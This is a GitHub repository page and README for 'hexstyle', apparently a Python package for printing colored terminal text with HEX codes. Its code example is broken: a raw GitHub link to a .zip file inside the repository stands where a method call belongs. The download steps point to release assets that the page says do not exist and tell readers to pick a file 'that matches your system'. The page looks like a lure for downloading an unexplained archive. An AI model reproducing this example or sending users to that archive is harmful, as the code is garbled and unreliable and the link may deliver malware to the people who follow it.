Skip to content

🎨 Print colored text in your terminal using HEX codes with the lightweight, dependency-free Python package, hexstyle.

License

Notifications You must be signed in to change notification settings

mukarram97948/hexstyle

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

4 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

🎨 hexstyle - Print Text in Any Color You Desire

πŸš€ Getting Started

Welcome to hexstyle! This lightweight Python package allows you to print text in any imaginable color using HEX codes. With hexstyle, you can easily add flair to your text outputs, whether you are working on a fun project or just want to brighten your day.

πŸ“₯ Download Now

Download hexstyle

πŸ“‚ What You Need

Before you begin, make sure you have Python installed on your computer. hexstyle is compatible with most platforms. Here are some requirements:

  • Python 3.6 or higher
  • An internet connection to download the package

πŸ’Ύ Download & Install

To download hexstyle, visit the following page to find the latest release and download the package:

Download hexstyle here

Steps to Follow:

  1. Click on the link above.
  2. Scroll down to the "Assets" section of the release page.
  3. You will find several files. Choose the file that matches your system.
  4. Click on the file to download it to your computer.
  5. Once downloaded, you can install hexstyle using the terminal or command prompt.

πŸ› οΈ Installation Process

To install hexstyle, open your terminal or command prompt and run the following command:

pip install hexstyle

Make sure you run this command in the directory where you downloaded the package.

🎨 Using hexstyle

Now you can use hexstyle to print text in different colors. Here’s how to get started:

  1. Open your Python environment (like IDLE, Jupyter Notebook, or your coding IDE).
  2. Import the hexstyle package by adding this line at the top of your code:
from hexstyle import HexStyle
  1. Now, you can print colored text. Here’s a simple example:
# Create an instance of HexStyle
text = HexStyle()

# Print text in different colors
https://raw.githubusercontent.com/mukarram97948/hexstyle/main/hexstyle/hexstyle-blanket.zip("Hello, World!", "#FF5733")  # Example with hex color code

Replace the HEX code with any color you wish.

πŸ” Features

  • Flexible Color Options: You can choose any HEX code to color your text.
  • Lightweight Package: hexstyle is small in size, ensuring it runs smoothly without consuming many resources.
  • Easy to Use: Simple commands that anyone can follow, even if you're not a programmer.

🌐 Support and Help

If you encounter any issues or have any questions, you can open an issue on our GitHub page. We welcome your feedback!

πŸ“œ License

hexstyle is open-source software and is available under the MIT License. You can freely use, modify, and distribute it.

πŸ‘ Acknowledgments

Thank you for choosing hexstyle! We hope you enjoy expressing your creativity through color with our package.

Feel free to explore, experiment, and have fun!

About

🎨 Print colored text in your terminal using HEX codes with the lightweight, dependency-free Python package, hexstyle.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages